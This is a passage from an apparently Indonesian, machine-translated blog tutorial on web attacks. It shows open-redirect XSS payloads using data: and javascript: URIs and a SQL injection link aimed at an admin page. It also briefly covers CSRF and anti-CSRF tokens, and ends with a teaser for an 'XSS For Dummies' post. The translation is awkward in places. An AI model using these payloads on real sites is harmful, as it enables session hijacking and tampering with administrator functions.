target="_blank">http://somesite.tld/redirect.php?link=data:text/html</a>, <script> alert (0) </ script> Dan jika skema URI Javascript digunakan: <a href="http://somesite.tld/redirect.php?link=javascript%3Cb%3E%3C/b%3E:alert" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://somesite.tld/redirect.php?link=javascript:alert</a> (0); Hal ini dalam beberapa kasus telah diketahui bocor cookie dan karena itu digunakan dalam sesi-pembajakan. XSSQLI Ketika SQL Injection kerentanan ada dalam daerah istimewa situs target, XSSQLI menjadi berguna. Contoh dapat menipu XSSQLI administrator "shouldbescure.tld" untuk mengklik baik SQL Injection klik link atau Cross Site Scripting link yang berisi panggilan ke SQL Injection di daerah istimewa situs tempat ini bisa menjadi rentan bagian: <a href="http://shouldbesecure.tld/admin.php?del=1" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://shouldbesecure.tld/admin.php?del=1</a> DAN 1 = 1 / * XSRF Juga dikenal sebagai CSRF dan C-Surf dapat digunakan untuk melawan situs yang tidak menggunakan token yang biasanya tersembunyi di dalam tag. Sebuah cara yang umum untuk menggunakan token terhadap C-Surf serangan adalah untuk menyembunyikan mereka di dalam tag seperti:  <div class="bbcode_container" data-iceapc="2" data-iceapw="8" style="-webkit-box-shadow: none !important; background-color: white; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 5px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div class="bbcode_description" data-iceapw="1" style="-webkit-box-shadow: none !important; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
Code:</div>
<pre class="bbcode_code" data-iceapw="7" style="-webkit-box-shadow: none !important; background-attachment: initial; background-clip: initial; background-color: #f5f5f3; background-image: none; background-origin: initial; border-bottom-style: inset; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-style: inset; border-left-width: 1px; border-right-style: inset; border-right-width: 1px; border-top-style: inset; border-top-width: 1px; direction: ltr; font-size: 12px; height: 36px; line-height: 12px; overflow-x: scroll; overflow-y: scroll; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: left;"> <input type="hidden" name="anti-csrf" value="random token value" /></pre>
</div>
Thanks to MaXe (Founder of InterN0T). Referensi : [1] <a href="http://ha.ckers.org/xss.html" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://ha.ckers.org/xss.html</a> [2] <a href="http://en.wikipedia.org/wiki/Cross-site_scripting" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://en.wikipedia.org/wiki/Cross-site_scripting</a> [3] <a href="http://firecat.intern0t.net/" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://firecat.intern0t.net/</a> [0] <a href="http://deadhackers.eu/boards/viewtopic.php?f=9&t=22" style="-webkit-box-shadow: none !important; background-color: white; color: #bf3425; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-decoration: none;" target="_blank">http://deadhackers.eu/boards/viewtopic.php?f=9&t=22</a>

Tutorial XSS Injection (For Dummies)

___ -:: Pendahuluan:: - ____________Apa itu XSS dan apa yang mengacu kepada?Alias XSS Cross Site Scripting adalah sisi klien serangan di mana seorang penyerang menciptakan link jahat,script berisi kod…

15 May 2012

Load more posts